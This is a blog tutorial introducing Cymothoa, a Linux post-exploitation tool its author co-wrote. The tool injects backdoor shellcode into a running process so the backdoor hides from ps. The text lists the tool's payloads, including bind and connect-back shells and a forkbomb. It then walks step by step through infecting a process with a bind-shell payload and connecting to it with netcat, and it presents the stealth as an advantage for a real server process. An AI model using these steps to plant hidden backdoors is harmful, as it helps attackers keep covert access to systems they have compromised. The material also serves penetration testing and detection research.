Introduction to Cymothoa
01 May 2010
NOTE: This the English translation of an article previously appeared in Italian. For the original version click here.
Originally written as a small tutorial, for the release of cymothoa
alpha, I've updated the English version adding some
extra explanations, taken from the comments of the original
article.
I have also written an article an Phrack describing more advanced techniques. you can find it here.
A first alpha version of cymothoa has just been released by codwizard and me (http://cymothoa.sourceforge.net/).
Cymothoa is a tool used to create hidden backdoors on a computer system. To do so, it injects the machine code of the backdoor in the memory space of an already executing process of the machine.
The technique is nothing new per se, but we tried to package it in a tool having a convenient interface.
Using this technique, there is no need to create a new process in the system (and thus exposing the backdoor to an easy detection by using common tools): the backdoor can live in symbiosis (or better, as a parasite) with an hosting process, so that commands like ps aux can not detect it.
For particular kind of backdoors, however, a separate process is highly desirable, for example to implement a client-server backdoor able to serve multiple clients at the same time. This can be addressed forking or cloning the host process, or using more subtle ways (see: single process parasite.) But even these kind of infections are not so easy to spot, since the forked process still inherit the name and the memory content of the original infected process.
Consider, for example, a common configuration of the apache web server: a single parent process receives HTTP requests from clients, then fork a child (or reuse a pre-forked child) to handle the request. The system administrator will always see, when running ps, a number of active apache processes. It is very unlikely that an extra "apache" process, containing the backdoor, will arise suspect.
How to use itThe first thing to keep in mind using cymothoa, is that it is a post-exploitation tool, not an exploit. To infect a process we must either be root on the machine, or have at least enough privileges to send arbitrary signals to the target process.
We begin listing all the processes running on the machine, to
find a suitable process to infect:
root@bt:~# ps -A | tail
4915 ? 00:00:00 krandrtray
4928 ? 00:00:00 knotify
4967 ? 00:00:01 konqueror
6674 ? 00:00:00 konsole
6675 pts/1 00:00:00 bash
6684 pts/1 00:00:00 cat
6685 ? 00:00:00 konsole
6686 pts/2 00:00:00 bash
6696 pts/2 00:00:00 ps
6697 pts/2 00:00:00 tail
To illustrate how to use the tool, we will target a cat process, with pid 6684, running in another terminal window. In this way we can check if the hosting process continues to run correctly after the infection.
In a real situation a server process or a daemon (like apache,
as discussed before) is a much better choice. The steps are
exactly the same.
We can now choose the parasite to use, listing those available in our cymothoa binary:
root@bt:~# ./cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd
We will create a classic backdoor using the second shellcode, which bind a shell on a TCP port, and spawn the backdoor as a separate process. We can also personalize the shellcode specifying the port to listen on.
To infect the victim we specify the target pid, the shellcode index, and the backdoor TCP port:
root@bt:~# ./cymothoa -p 6684 -s 1 -y 5555
[+] attaching to process 6684
register info:
eax value: 0xfffffe00 ebx value: 0×0
esp value: 0xbfed7208 eip value: 0xffffe424
[+] new esp: 0xbfed7204
[+] injecting code into 0xb7f4d000
[+] copy general purpose registers
[+] detaching from 6684
[+] infected!!!
Good, the tool tells us the host process as been correctly
infected. Now, if we run ps again, we should see a new cat
process, running our backdoor:
root@bt:~# ps -A | tail
6674 ? 00:00:00 konsole
6675 pts/1 00:00:00 bash
6684 pts/1 00:00:00 cat <-- original process
6717 pts/1 00:00:00 cat <-- backdoor
6718 pts/2 00:00:00 ps
6719 pts/2 00:00:00 tail
If we return to the console where we launched the original cat process, we can see that its behaviour has not changed and that it continues to print back to us the text we type in its standard input.
Last thing to do is connecting to the backdoor with netcat:
root@bt:~# nc -vv localhost 5555
localhost [127.0.0.1] 5555 (?) open
uname -a
Linux bt 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux
We are in...
Further ideas
This tool was initially developed as a simple proof of concept for some ideas we had in mind at the time (in particular to implement a single process parasite.)
So it is easy to add new backdoors: you can add your personalized shellcodes, or embed shellcodes available on the net (from sites like packetstormsecurity or exploit-db) simply editing a source file and recompiling the tool (we wish to keep it a stand-alone binary for obvious purposes).
The next thing planned is the port cymothoa to 64bit Linux
systems, since it now runs only on 32bit machine. Let me know if
you are interested in the port, otherwise
my laziness would
take over in the process...